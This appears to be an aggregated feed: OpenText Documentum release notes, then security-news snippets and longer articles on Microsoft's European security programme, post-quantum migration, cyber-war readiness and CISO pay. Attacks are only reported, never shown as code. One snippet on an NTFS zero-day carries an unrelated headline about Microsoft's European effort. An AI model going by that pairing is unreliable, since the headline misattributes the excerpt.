web-based admin interface for remote customization, and containerized architecture for cloud scalability, compatible with various file storage integrations like NAS, SAN, CAS, and Cloud-Store/SDS. This will help organizations: Improve efficiency and productivity - Lightning-fast, compute-powered search helps employees quickly find documents, cutting search time and boosting productivity. Enhance decision-making - Machine-learning engine enhances search relevance with multi-language, vector, and semantic support, aiding accurate, context-driven decisions. Save money- Containerized, cloud-optimized architecture cuts costs with scalable integrations (NAS, SAN, CAS, Cloud-Store/SDS), reducing reliance on expensive on-premises hardware. Support global accessibility - Supports multiple languages and a web interface, enabling effective search access and collaboration for global teams. Streamlined business process structures with a fully integrated Microsoft® Teams® owner experience Gone are the days of relying on IT or Cloud Ops to manipulate complex workflows to meet the changing demands of the organizations, now business power users and administrators can easily: Unlock documents Cancel checkouts Pause a workflow Resume a workflow Abort a workflow Update a workflow supervisor BOCS: Empowering remote operations with instant, offline access to critical materials BOCS (Branch Office Caching Services) enables remote offices, such as oil rigs and mines, to instantly access the latest materials like manuals, repair instructions, and safety guides, even without network connectivity. This is achieved through containerization of OpenText Documentum CM Messaging Services (DMS), updates to Smart View and M365 for accessing cached content in BOCS, and providing instructions for BOCS access and off-cloud deployment. A few examples of business benefits are: Efficient, scalable deployment across multiple remote locations using Containerization of OpenText Documentum CM Messaging Services (DMS). Enables smooth access to cached content and ensures compatibility with existing tools and workflows. Reduce setup time and technical challenges for remote deployments by providing clear BOCS access and off-cloud deployment instructions. Deliver more insightful, actionable data Through enhanced reporting and dashboards combined with improved usability and customization options, improves usability and provides easy to customize options.  Now available as part of the OpenText Documentum CM X-Plans, the new reporting and dashboards take advantage of the modern capabilities of the Smart View client.  The new administrative toolkit includes templatized reports and dashboards. Reports are powered by templates and configurable Documentum Query Language (DQL) that aid in the creation and delivery of new reports. August 2024: What's new in OpenText Documentum CE 24.2 The OpenText Documentum CE 24.2 release includes new capabilities designed to help organizations deliver the power of Documentum throughout their organization in a more personalized manner. Accelerate content discovery through chat-based conversational search OpenText™ Content Aviator for Documentum is the intelligent assistant everyone wants because it helps users discover content faster with an interactive chat interface.  Users can quickly understand documents with automated analysis, summaries and translations.  This boosts productivity, efficiency and satisfaction by providing instant access to relevant answers to natural language questions. Improve search results with the next generation of Documentum Search The new Documentum Search provides: Lightning-fast performance that matches with compute power Enhanced search relevance through use of a machine-learning analytic engine that supports different languages, vector & semantic search A modern web administrator interface that provides effective tools to make it easier to tailor search experiences remotely Containerized for cloud-scale by supporting a variety of popular integrations of file-stores like: NAS, SAN, CAS, and Cloud-Store/SDS Keep your secrets secret with an extra layer of protection As hackers become increasingly more aggressive and smarter, Documentum is ready to help customers ensure their sensitive data is protected by creating new ways to manage access to secrets. Now, customers can configure Documentum using mapped vault keys.  By updating the vault secrets are removed from encrypted configurations files, making it even harder to access.  To bring further confidence to this solution, Documentum chose to work with the leader in the industry, HashiCorp Vault, to provide this level of security.  This is a win-win for Documentum customers and a lose-lose for bad actors. Inspire business power users and managers to take control of their work   Gone are the days of relying on IT or Cloud Ops to manipulate complex workflows to meet the changing demands of the organizations, now business power users and administrators can easily: Unlock documents Cancel checkouts Pause a workflow Resume a workflow Abort a workflow Update a workflow supervisor Enhance user productivity working with content stored in Documentum from within Microsoft Teams Expose Smart View Search and Advanced Search capabilities to users working from Teams Supports all Smart View functionality and menu options, including virtual documents and mass update Reduce administrative tasks to manage the integration via intelligent automation New automation framework for detecting changes to Team membership in Microsoft and synchronizing the Team workspace in Documentum When new members are added or deleted – the access to the mapped folder in Documentum is updated Support existing business process structures Team Owners may now choose to create a mapped team workspace in Documentum or select an existing folder/workspace Allows Team Owners to easily link existing business process pre-configured folder structures in Documentum as the workspace for a Team Help your new users navigate the mobile app with a self-paced guided tour Now OpenText Documentum Smart View mobile users can better understand how to use the mobile app by taking a self-paced guided tour with Documentum coachmarks. Coachmarks play an important role in enhancing user engagement, reducing confusion, and improving user retention rates within mobile applications. The new coachmarks present themselves as green dialogues that coach, or teach, a feature to the users with contextual information or instructions. Coachmarks can be used during onboarding when a user first launches the app. They can be used to help current users discover and understand new features designed to make it easier for the user to stay in the mobile app to complete a complex project. December 2023: What’s new in OpenText Documentum CE 23.4 OpenText is pleased to introduce OpenText Documentum CE 23.4, which we fondly refer to as ‘One Documentum’ because it brings the  power of Documentum into a single solution that helps organizations realize extended value from their Documentum system by: Inspiring collaboration and optimizing processes Simplifying deployments and upgrades Modernizing licensing  Providing end-to-end archival for mature content Introducing One Documentum: A new way to Re-IMAGINE Documentum. Inspiring collaboration and optimizing processes The new OpenText™ Extended ECM Documentum™ for Microsoft® 365 solution connects people, content and tools to keep teams engaged and productive Customer-facing teams always have access to real-time data and content to make informed decisions and deliver outstanding service to their valued clients Rights-based access and pre-defined business rules enable content stakeholders to view, edit and manage the information they need without navigating multiple systems to locate content in potentially restricted systems or areas Users can create content and collaborate in Teams, while remaining focused on the processes and goals managed by ERP, CRM and HCM applications Simplifying deployments and upgrades One-click deployment reduces upgrade time and effort Simplified certification matrix takes away the guesswork when upgrading Custom or standardized private-cloud plans to leverage Documentum as a cloud service Deploy Documentum with your own data centers or other hyperscalers Documentum™ Smart View (formerly Documentum™ D2 Smart View) users can quickly resize columns, switch between lists, pinned column and grid modes, all leveraging sticky memory to ensure their personal changes persist until the next time they need to make a change Leverage the Documentum Smart View SDK to extend and customize Documentum Smart View Migrate custom WebTop applications to Documentum Smart View Create similar Webtop customizations in Documentum Smart View Move the Classic Custom Dialog plugins with no modification or replication needed Define and layout extension/override capabilities of the out-of-the-box Documentum Smart View components Modernizing licensing Move away from the years of license pileup with a new, modern licensing structure that consolidates licenses into a single model number The new Documentum X-Plans provides discounted upgrade paths with extended functionality Providing end-to-end archival for mature content Empower external users to perform self-service transactions on secure content from anywhere with the new Documentum External Transactions license Ensure all parties are always working on the latest version of the document and can make better decisions faster, reducing the cost to the business. May 2023: What’s new in OpenText Documentum CE 23.2 With the release of OpenText™ Documentum™ CE 23.2, we’ve made improvements across the platform to enhance the user experience, automate workflows, and ensure compliance. Here’s a glance at a few of the new features in 23.2:   Augment productivity in D2 Smart View   Documentum D2 Smart View users can quickly resize columns, switch between lists, pinned column and grid modes, all leveraging sticky memory to ensure their personal changes persist until the next time they need to make a change.  Customize the UI to empower and delight users  Leverage the Documentum D2 Smart View SDK to extend and customize D2 Smart View.  Migrate custom WebTop applications to D2 Smart View.  Create similar Webtop customizations in D2 Smart View.  Move D2 Classic Custom Dialog plugins with no modification or replication needed.  Define and layout extension/override capabilities of the out-of-the-box D2 Smart View components.   Engage external users at every step of the process  Empower external users to perform self-service transactions on secure content from anywhere with the new Documentum External Transactions license  Ensure all parties are always working on the latest version of the document and can make better decisions faster, reducing the cost to the business.  Augment productivity in D2 Smart View with column resize.  June 2022: What’s new in OpenText Documentum CE 22.2 With the release of OpenText Documentum CE 22.2, we’ve made improvements across the platform to enhance the user experience, automate workflows, and ensure compliance. Here’s an overview of what’s new in CE 22.2: Enhance user experiences Modern work calls for new tools and new ways of thinking about Information Management. The new in-place viewing and Docmerge capabilities of OpenText™ Documentum™ D2 help enhance modern work by making it easier for users to complete their work from a single location without the need to switch back and forth between content stored in various locations. Now users can: Preview, review and compare document properties and content in a single view Adjust the viewing area for the size that best suits the current task Quickly compare text on a document from one version to another Compare drafts of CAD drawings by toggling between a view of each drawing individually, showing drawings side-by-side or overlaying them with or without differences being contrasted An example of the in-place viewing on the properties page in OpenText Documentum D2 An example of how Documentum allows users to quickly compare text changes from one version to another Automate workflows OpenText Documentum Advanced Workflow is a new workflow designer that allows organizations to bring the power of OpenText™ Documentum™ xCP workflows to the applications of choice without the need for UI composition. This allows the users to remain in the applications they use the most while leveraging advanced workflows for content processing.    An example of how users can create process-driven applications without implementing a new user interface within Documentum xCP Enhance compliance with digital signatures Documentum D2 and D2 Mobile’s holistic integration with OpenText™ Core Signature ensures compliance by providing an ink-like digital signature as part of any D2 workflow. The signed documents are automatically retrieved back into Documentum where they are stored and logged with the required audit details using pre-configured business rules as required by the governing regulations. An example of Documentum D2 and D2 Mobile integration with OpenText Core Signature. November 2021: What’s new in OpenText Documentum CE 21.4 Update 1: Design and manage workflows The new web-based Workflow Designer provided with the Documentum Platform can be used for designing and managing D2 workflows. Current Documentum customers can migrate their workflows from Workflow Manager using the migration utility. Update 2: Access Salesforce information Documentum’s new integration with Salesforce® helps accelerate sales cycles by sharing content stored in Documentum directly from the Salesforce user interface. Users avoid miscommunication and improve the customer experience by always leveraging the most current Salesforce information. Organizations can rest assured their content will not be misused, since the content carries with it the enterprise security and compliance standards built into Documentum. Update 3: Simplify access to lifecycle management Documentum D2 Smart View users can now apply lifecycle changes to a document in Smart View based on their user privileges. Business rules are consistently and automatically applied to documents as they progress through the various states of the document’s lifecycle. Update 4: Update en masse Merger and acquisition activity and drug-status changes for Life Sciences companies are examples of use cases that often require mass updates to be made to documents, folders and virtual documents. To ensure these changes are made consistently and quickly, Documentum D2 updates properties on multiple objects in one action. This includes replacing attributes based on conditions of other fields. Update 5: Do more when mobile Documentum D2’s new mobile capabilities include: QR code scanning Relations management, for creating and viewing relations Document lifecycle management Viewing and working on checked-out documents via tile landing pages and the hamburger menu of the mobile device e-Signature support in key areas such as task processing, lifecycle, versioning, properties and non-credential IDP Added security and compliance with e-Sign during task processing, lifecycle management and versioning or editing properties Working/supporting files and task notes added directly by clicking on the add button in the app header Update 6: Easily create an attractive dashboard Documentum xCP Case Management Framework assists in building Smart Applications. When designing and implementing a mortgage application process, for example, the new tiles and dashboard layout improve interaction and usability, provide better access to data and increase productivity with a modern interface and organized workspace.  Developers can easily create dashboards with the xCP Tile Layout Widget. Tiles provide interactive links to Data Services or any URL and can also link to common application functionality to create a dashboard menu that enhances the user experience.  April 2021: What’s new in OpenText Documentum CE 21.2 Update 1: Improve productivity Authored content with tracked changes is often converted to PDF for submission and approval workflows—but that usually means the record of document modifications is lost. Content Transformation Services now retains comments and tracked changes when Word Documents are converted to PDFs, allowing for complete lossless interaction and change management. Additionally, Documentum Content Trusted Services can also now burn watermark text into video content for copyright purposes. Update 2: Enhanced online and offline workflow management Smart View users can now start workflows and insert their documents into pre-defined business processes. They can find and manage workflows, either their own or workflows started/belonging to others, and then pause, abort or provide an update to the workflow supervisor. Workflow features extend to the free Documentum D2 Mobile App, where users can continue to work on documents offline, then initiate workflows for approvals and processing once back online. Update 3: Streamlined Microsoft Teams collaboration Microsoft Teams users will be delighted with the ability to quickly spin up new Teams through content stored and governed in Documentum. They’ll also have the ability to clean up the Teams space post collaboration by automatically moving all content in the space to Documentum in order to prevent content sprawl. This new functionality simplifies and streamlines the complete collaboration lifecycle, from creation of a Teams site using content stored and governed in Documentum, through to checking files back into Documentum upon completion of the activity in Teams November 2020: What’s new in OpenText Documentum CE 20.4 Update 1: Documentum Platform security improvements Security improvements include mandatory events, to ensure multiple logins and failed login attempts are tracked, especially if they are from different locations. And two-man oversite of audit trails eliminates the risk of accidental or malicious tampering by a super-user. For customers moving to the cloud, an update calculator is now included with the containerized release to help customers manage the cost and impact of a container update. New certifications include Azure blob storage to help reduce the costs of storing content in Azure. Update 2: Documentum D2 enhancements In Documentum D2, we continue to focus on enhancing the Smart View to work more intuitively and across more use cases. For users, the new in-place viewer provides a seamless way to preview content without having to exit their current working environment. For Administrators, the D2-Config application can now be used with Google Chrome—a popular feature request from customers. Documentum D2 Mobile, the free mobile app for Documentum D2 customers, now allows users to scan barcodes for immediate access to the latest information. Workflow tasks can now be accessed from the home screen and can be actioned to speed up workflows. Update 3: Documentum xCP case management Documentum xCP CE 20.4 simplifies the development of dynamic, case-management solutions by enhancing the OOTB (Out of the Box) application that stands as the starting point for mapping to specific processes. The new Case Management Framework assists in building Smart Applications using enhancements in the OOTB starting-point application—including the ability to search custom objects, sort results dynamically, and import task attachments from local file systems. All of which enables faster implementation cycles. The post What’s new in OpenText Documentum Content Management appeared first on OpenText Blogs.

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices. This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations. Exploitation Vector & Payload Delivery Attackers exploit the vulnerability […] The post New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A critical heap-based buffer overflow vulnerability, tracked as CVE-2025-24993, has been discovered in the Windows New Technology File System (NTFS), posing a significant threat to millions of Windows users globally. The flaw, patched during Microsoft’s March 2025 Patch Tuesday, was actively exploited as a zero-day in the wild, prompting urgent advisories from both Microsoft and […] The post Microsoft Unveils European Security Effort to Disrupt Cybercrime Networks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The AhnLab Security Intelligence Center (ASEC) has recently issued a detailed report confirming the persistent distribution of ViperSoftX malware by threat actors, with notable impact on users in South Korea and beyond. First identified by Fortinet in 2020, ViperSoftX is a sophisticated PowerShell-based malware designed to infiltrate infected systems, execute remote commands, and steal sensitive […] The post ViperSoftX Malware Used by Threat Actors to Steal Sensitive Information appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The Qilin ransomware operation has recently joined attacks exploiting two Fortinet vulnerabilities that allow bypassing authentication on vulnerable devices and executing malicious code remotely.

iVerify’s NICKNAME discovery reveals a zero-click iMessage flaw exploited in targeted attacks on US & EU high-value individuals…

Over Easter, retail giant Marks & Spencer (M&S) discovered that it had suffered a highly damaging ransomware attack that left some shop shelves empty, shut down online ordering, some staff unable to clock in and out, and caused some of its major suppliers to resort to pen and paper. In a gloating abuse-filled email to M&S CEO Stuart Machin, the DragonForce hacker group claimed responsibility for the attack. Read more in my article on the Hot for Security blog.

When generative AI tools became widely available in late 2022, it wasn’t just technologists who paid attention. Employees across all industries immediately recognized the potential of generative AI to boost productivity, streamline communication and accelerate work. Like so many waves of consumer-first IT innovation before it—file sharing, cloud storage and collaboration platforms—AI landed in...

The cash has been frozen for more than two years The US is looking to finally capture the $7.74 million it froze over two years ago after indicting alleged money launderers it claims are behind North Korean IT worker schemes.

India's Central Bureau of Investigation (CBI) has revealed that it has arrested six individuals and dismantled two illegal call centers that were found to be engaging in a sophisticated transnational tech support scam targeting Japanese citizens. The law enforcement agency said it conducted coordinated searches at 19 locations across Delhi, Haryana, and Uttar Pradesh on May 28, 2025, as part of...

Microsoft will die Cybersicherheit in Europa stärken.MeshCube – shutterstock.com Microsoft warnt davor, dass sich Ransomware-Gruppen und staatlich geförderte Akteure aus Russland, China, dem Iran und Nordkorea in Umfang und Raffinesse stetig weiterentwickeln. Europa dürfe daher nicht zögern, seine Verteidigungsmechanismen zu stärken. Der Tech-Konzern will deshalb mit einer neuen Initiative bestehende Schutzprogramme erweitern und gezielt auf europäische Bedürfnisse eingehen. Das Europäische Sicherheitsprogramm besteht laut Microsoft aus drei zentralen Maßnahmen: Verstärkter Austausch von KI-gestützten Bedrohungsanalyse mit europäischen Regierungen; Gezielte Investitionen in die Stärkung von Cybersicherheitskapazitäten und Widerstandsfähigkeit; Ausbau von Partnerschaften, um Cyberangriffe effektiver zu stören und kriminelle Netzwerke zu zerschlagen. Das kostenfreie Angebot richtet sich an alle 27 Mitgliedstaaten der Europäischen Union (EU) sowie an EU-Beitrittskandidaten, Länder der Europäischen Freihandelsassoziation (EFTA), Großbritannien, Monaco und den Vatikan. “Dieses neue Programm erweitert die geografische Reichweite unserer bestehenden Arbeit und fügt neue Elemente hinzu, die für den Schutz Europas von entscheidender Bedeutung sein werden”, erklärte Brad Smith, Präsident und Vice Chair von Microsoft, bei der Vorstellung des Programms in Berlin. “Es stellt KI in den Mittelpunkt als Instrument zum Schutz traditioneller Cybersicherheitsanforderungen und stärkt die digitale und KI-Infrastruktur.” Lesetipp: Neue EU-Schwachstellen-Datenbank geht an den Start Aktuelle Cyberbedrohungslage Microsofts aktuelle Analysen zeigten, dass staatlich geförderte Cyberangriffe zunehmen. Demnach haben es besonders russische und chinesische Akteure auf europäische Netzwerke abgesehen. Russland konzentriere sich dabei weiterhin vor allem auf die Ukraine sowie auf Länder, die das Land militärisch oder politisch unterstützen, stellt der Microsoft-Präsidentfest. Zudem würden Hackergruppen aus dem Iran und Nordkorea gezielt Spionage-Angriffe starten, etwa durch den Diebstahl von Zugangsdaten oder das Ausnutzen von Sicherheitslücken. Microsoft zufolge geraten dabei zunehmend Forschungseinrichtungen und Think Tanks ins Visier von Cyberspionage-Kampagnen. Doch nicht nur staatliche Akteure bedrohen den Cyberraum: Die Entwicklung von Ransomware-as-a-Service hat laut Microsoft eine regelrechte Schattenwirtschaft entstehen lassen. „Wir beobachten das Aufkommen illegaler Websites, die schnell an Popularität gewinnen, indem sie Erkenntnisse über Ransomware weitergeben. Kriminelle Gruppen nutzen diese für Angriffe in ganz Europa“, so Smith. Darüber hinaus verstärkt und entwickelt der Aufstieg der KI auch das Verhalten von Bedrohungsakteuren. Microsoft hat die Verwendung von KI durch Bedrohungsakteure für Aufklärung, Vulnerabilitätsforschung, Übersetzung, LLM-refined operative Befehlstechniken, Ressourcenentwicklung, Skripttechniken, Umgehung von Erkennungsmassnahmen, Social Engineering und Brute-Force-Angriffe beobachtet. Deshalb verfolge der Konzern jetzt jede bösartige Verwendung neuer KI-Modelle und verhindere proaktiv, dass bekannte Bedrohungsakteure seine KI-Produkte verwenden. „Dies unterstreicht auch die Bedeutung der sicheren Entwicklung und des rigorosen Testens von KI-Modellen, die Nutzung von KI zugunsten von Cyber-Verteidigern und die Schließung öffentlich-privater Partnerschaften, um die neuesten Erkenntnisse über KI und Cybersicherheit zu teilen“, betont der Microsoft-Vize. Echtzeitinformationen über nationale Bedrohungslagen Das Unternehmen stellt im Rahmen des Programms gezielt aufbereitete Bedrohungsinformationen bereit, die auf nationale Sicherheitsbedürfnisse zugeschnitten sind. Die Informationen basieren auf einer Kombination aus technischer Analyse, Telemetriedaten und KI-gestützter Auswertung. Regierungen sollen damit einen besseren Überblick über Taktiken und Werkzeuge fortgeschrittener Angreifer erhalten – auch in Bezug auf den Missbrauch von KI durch staatliche Akteure. Ein wesentliches Ziel ist es, durch proaktive Informationsbereitstellung in nahezu Echtzeitdie Fähigkeit staatlicher Stellen zu erhöhen, Bedrohungen frühzeitig zu erkennen und abzuwehren. Die Microsoft-Initiative umfasst vier Handlungsfelder zur Stärkung der Cyberabwehr: KI-unterstützte BedrohungsaufklärungMicrosoft beobachtet kontinuierlich Aktivitäten nationalstaatlicher Akteure und nutzt KI, um neue Angriffsvektoren schneller zu erkennen. Die daraus gewonnenen Erkenntnisse werden direkt in die Zusammenarbeit mit europäischen Regierungen eingebracht. Ausweitung des Zugangs zu Cybercrime-IntelligenceDie Microsoft Digital Crimes Unit (DCU) stellt sicherheitsrelevante Informationen künftig verstärkt europäischen Partnern über das Cybercrime Threat Intelligence Program (CTIP) zur Verfügung. Dies ermöglicht eine effektivere Strafverfolgung und schnellere Gegenmaßnahmen bei koordinierter Cyberkriminalität. Früherkennung ausländischer EinflussoperationenDas Microsoft Threat Analysis Center (MTAC) analysiert gezielt digitale Einflussoperationen, die u. a. Deepfakes und KI-generierte Inhalte einsetzen. MTAC wird regelmäßig Analysen zu Desinformationskampagnen, narrativen Mustern und genutzten Plattformen bereitstellen – mit besonderem Fokus auf Bedrohungen für demokratische Institutionen. Priorisierte SicherheitskommunikationÜber etablierte Kanäle wie den Microsoft Security Update Guide und ergänzende Programme stellt Microsoft Informationen zu Schwachstellen und Schutzmaßnahmen schneller und gezielter zur Verfügung. Regierungen erhalten eine bevorzugte Informationslage mit konkreten Handlungsempfehlungen. Ein dedizierter Ansprechpartner bei Microsoft soll künftig für jede teilnehmende Regierung als direkte Koordinationsstelle fungieren. Investitionen in Resilienz, Kooperation und KI-Sicherheit Neben dem Ausbau der Bedrohungsanalyse investiert Microsoft auch substanziell in die europäische Cybersicherheitslandschaft. Im Fokus stehen: Public-Private-Kooperation mit Europol: Ein neues Pilotprojekt bindet DCU-Ermittler direkt beim Europäischen Cybercrime Centre (EC3) ein, um operative Abläufe zu verbessern und gemeinsame Ermittlungen zu ermöglichen. Stärkung der Zivilgesellschaft: Microsoft verlängert die Kooperation mit dem CyberPeace Institute, das NGOs unterstützt und Ransomware-Kampagnen dokumentiert. Technisches Know-how wird dabei von rund 100 freiwilligen Microsoft-Mitarbeitenden bereitgestellt. Regionale Sicherheitsförderung im Westbalkan: Über das Western Balkan Cyber Capacity Centre (WB3C)  fördert Microsoft die Entwicklung lokaler Cybersicherheitskapazitäten in einer geopolitisch exponierten Region. Forschung zu KI-Sicherheit in Großbritannien: Gemeinsam mit dem Laboratory for AI Security Research (LASR) wird ein Forschungsprogramm zu Cybersicherheit in agentischer KI und kritischer Infrastruktur initiiert. Absicherung der Open-Source-Lieferkette: Mit dem GitHub Secure Open Source Fund sollen zentrale europäische OSS-Projekte wie Log4J oder Scancode sicherer gemacht und gegen potenzielle Angriffe gehärtet werden. Mit dem neuen Programm unterstreicht Microsoft sein langfristiges Engagement für ein sicheres digitales Europa. „Unabhängig davon, wie sich die Bedrohungslage entwickelt, bleibt Microsoft ein verlässlicher Partner an der Seite Europas“, versichert Smith. Um zukünftige Abschaltungen zu beschleunigen, hat Microsoft auch das Programm „Statutory Automated Disruption“ (SAD) im April 2025 ins Leben gerufen. Diese Initiative automatisiert Rechtsmissbrauchsmeldungen an Hosting-Anbieter und ermöglicht eine schnellere Entfernung von bösartigen Domains und IP-Adressen. Anfänglich auf Europa und die USA fokussiert, erhöht SAD die Kosten für Geschäfte für Cyberkriminelle und macht es ihnen schwerer, in großem Maßstab zu operieren, hieß es. Darüber hinaus arbeitet Microsoft mit lokalen Internetanbietern zusammen, um die Sicherheit der betroffenen Nutzer zu unterstützen und sicherzustellen, dass die Regierungen eine größere Sichtbarkeit in aufkommende Bedrohungen haben.

Microsoft and CrowdStrike announced an effort to deconflict the overlapping names of threat groups and reduce confusion for companies, but we've been here before.

COMMENTARY | Advanced threats, including ransomware, supply chain breaches and nation-state attacks, exploit the fact that the current approach to cloud security needs improvement.

Check out a new roadmap for adopting quantum-resistant cryptography. Plus, find out how your company can create a better cybersecurity environment. In addition, MITRE warns about protecting critical infrastructure from cyber war. And get the latest on exposure response strategies and on CISO compensation and job satisfaction.Dive into five things that are top of mind for the week ending June 6.1 - Group releases roadmap for adopting post-quantum cryptographyIs your organization looking for guidance on how to carry out its migration to post-quantum cryptography (PQC)? A group that includes MITRE, Microsoft and IBM just released a roadmap designed to help organizations plan and execute their adoption of PQC.Titled “Post-Quantum Cryptography (PQC) Migration Roadmap,” the 20-page document from the “Post Quantum Cryptography Coalition” breaks down PQC migrations into four major stages:Preparation, which includes identifying the transition’s main goals, assigning a project leader and identifying key stakeholdersBaseline understanding, which includes a comprehensive inventory of the data and assets to be protected, as well as determining required resources and budgetsPlanning and execution, which includes collaboration with internal and external partners to either acquire or develop the necessary tools for the migrationMonitoring and evaluation, which includes establishing metrics for tracking the project’s progress and for reassessing cryptographic security, based on the evolution of quantum capabilities "This roadmap empowers CIOs and CISOs to act decisively, taking proactive steps to protect sensitive data now and in the future,” Wen Masters, MITRE’s VP of cyber technologies, said in a statement. Transitioning to PQC, also known as quantum-resistant cryptography, is a complex process that’s expected to take the typical enterprise multiple years to complete and, as such, it will require exacting planning and ultra-precise execution.Embarking on the process to adopt PQC is necessary because when quantum computers become generally available — expected to happen at some point between 2030 and 2040 — they’ll be able to crack today’s public key cryptographic algorithms, which protect all types of digitally stored and transmitted dataAlgorithms for quantum-resistant encryption are already available. The U.S. National Institute of Standards and Technology (NIST) released three quantum-resistant algorithm standards in 2024 and expects to release a fourth in 2026. There’s another PQC standard called Covercrypt from the European Telecommunications Standards Institute (ETSI). Earlier this year, NIST picked its fifth PQC algorithm, expected to be available for use in 2027. Other resources designed to help organizations with PQC adoption include NIST’s white paper “Considerations for Achieving Crypto Agility” and the U.K. National Cyber Security Centre’s (NCSC) “Timelines for migration to post-quantum (PQC) cryptography.” For more information about how to protect your organization against the quantum computing cyber threat:“How to achieve crypto-agility and future-proof security” (TechTarget)“Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)“Post-quantum cryptography migration use cases” (IETF)“US unveils new tools to withstand encryption-breaking quantum. Here's what experts are saying” (World Economic Forum)“You need to prepare for post-quantum cryptography now. Here’s why” (SC World)“Quantum and the Threat to Encryption” (SecurityWeek)2 - How to establish a great cybersecurity culture in your orgCorporate culture can have a major impact on the success or failure of a company’s cybersecurity efforts. So how do you create an organizational environment that boosts cybersecurity?That’s the question the U.K. National Cyber Security Centre (NCSC) tackled with the publication this week of its “Cyber security culture principles” guidance. The document unpacks six core recommendations aimed at getting the staff to embrace cybersecurity processes. “The principles describe cultural conditions that are essential underpinnings for an organisation to be cyber secure and offer an approach to developing that culture,” reads an NCSC blog. Here’s a high-level view of three of these principles:Frame cyber as an enabler: Foster a sense that cybersecurity is everyone’s responsibility by clearly positioning it as a “shared purpose.” Demonstrate how cybersecurity isn’t a barrier to but rather a facilitator for achieving business goals.Encourage openness: Make it easy for employees to report security issues and to ask questions. Investigate issues fairly and transparently, with the goal of fixing problems and sharing lessons learned, as opposed to affixing blame.Embrace change: Stay attuned to emerging cyber risks and be ready to modify cybersecurity processes accordingly. Show how this capacity to adapt to new cyber threats helps strengthen the organization’s resilience.For more information about creating a healthy cybersecurity culture in your organization:“How to Create an Enterprise-Wide Cybersecurity Culture” (Information Week)“A new age of cybersecurity culture” (KPMG)“Signs Your Organization's Culture Is Hurting Your Cybersecurity” (Dark Reading)“How to turn around a toxic cybersecurity culture” (CSO)“Creating a Culture of Cybersecurity Awareness” (IT Executives Council)VIDEOImprove Your Cyber Security Culture (SANS Institute)3 - MITRE: U.S. critical infrastructure must be ready for cyber warIn addition to preventing and mitigating standalone cyber threats and attacks, U.S. critical infrastructure organizations must have a plan in case a lengthy, widespread cyber war breaks out.That’s the call from MITRE, which has published a fact sheet with key actions for getting critical infrastructure organizations ready for an all-out cyber conflict that disrupts multiple essential services for a sustained period of time.Titled “5 Steps To Prepare Critical Infrastructure for a Cyber War,” the document is aimed at critical infrastructure operators; federal, state and local governments; businesses; and communities. The fact sheet is based on a classified tabletop exercise held at MITRE’s headquarters in December in which 70 government and private-sector organizations participated in a simulated cyber war.“The event revealed the urgent need for infrastructure owners/operators, government agencies, and communities to shift from addressing isolated cyber incidents to preparing for large-scale cyber conflicts lasting weeks to months,” the document reads.Here are five steps MITRE views as necessary for critical infrastructure organizations to get ready for a cyber war scenario:Create a civil defense mindset: Make citizens aware that basic services like electricty, water, telecom and transportation may be impacted. Stakeholders should plan how to issue emergency responses and how to prioritize restoration efforts.Manage limited resources: Critical infrastructure operators should test their incident response plans, while governments must plan with businesses how to address service outages.Plan to operate under extreme conditions: Recovering from the impacts of cyber war requires planning for coping with devastating outages that last weeks. Measures should include training staff for manual, disconnected operations, and boosting cyber resilience.Strengthen emergency communications systems: Develop communication systems and processes that’ll withstand a cyber war’s disruptions, along with ways to authenticate the identity of those involved.Ensure workforce readiness: Because the workforce will likely shrink during a cyber war emergency, contingency plans should be made to operate with a smaller staff, including training workers for this scenario.Full details about the tabletop exercise are available to U.S. critical infrastructure owners and operators, as well as to government agencies. Those interested can request access by writing to this email address: CICSTTX@mitre.org.For more information about cyber warfare:“Preparing for Cyber Warfare: 6 Key Lessons From Ukraine” (Dark Reading)“Cyberwarfare: The new frontlines” (Cybersecurity Guide)“‘Russia can turn the lights off’: how the UK is preparing for cyberwar” (The Guardian)“The Growing Threat of Cyberwarfare from Nation-States” (PaymentsJournal)“Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team” (Wired)4 - Tenable webinar poll spotlights exposure response strategiesDuring our recent “Tenable Vulnerability Management Customer Update, June 2025” webinar, we polled attendees on their exposure response strategies and challenges. Check out what they said.(152 webinar attendees polled by Tenable, June 2025)  (145 webinar attendees polled by Tenable, June 2025. Respondents could choose more than one answer.)Watch this on-demand webinar to get the latest on Tenable Vulnerability Management and to learn how to develop exposure response strategies.5 - Despite high salaries, many CISOs at large orgs are dissatisfiedWith median salaries north of $500,000 and top earners making $1.3 million-plus annually, CISOs at large enterprises are making bank, but, ironically, job dissatisfaction among them is high.That’s according to the “2025 Compensation and Budget for CISOs in Large Enterprises Benchmark Report” from IANS Research and Artico Search, which also found that a large percentage of these CISOs are actively looking for new jobs.“Large enterprise CISOs might be among the highest paid across industries, yet our report reveals that many CISOs feel stretched too thin, and low job satisfaction keeps them open to new opportunities,” reads an IANS Research blog about the report.Specifically, many of these CISOs are unhappy with their team’s budget and, to a lesser extent with their compensation. It’s also common for them to struggle broadening their focus from overseeing cybersecurity technology to supporting business initiatives.“When elevating an enterprise CISO role, the position is less about technical acumen and more about business risk and business alignment,” Matt Comyns, Artico Search co-founder and president, said in the blog. “In some respects, the market is training technical leaders in a way that is mismatched from the aspired job of CISO,” he added. (Source: “2025 Compensation and Budget for CISOs in Large Enterprises Benchmark Report” from IANS Research and Artico Search, May 2025)The report defines these CISOs as those who work at enterprises with more than $1 billion in revenue. They make an average of about $700,000 in total compensation annually.For more information about CISO trends:“Why Security Leaders Are Opting for Consulting Gigs” (Dark Reading)“CISO Burnout Is Increasing — Here’s How to Help Them” (Reworked)“CISO Paychecks: Worth the Growing Security Headaches?” (Dark Reading)“Has the CISO finally been accepted as a key strategic player?” (Deloitte)“CISOs in 2025: Evolution of a High-Profile Role” (Information Week)

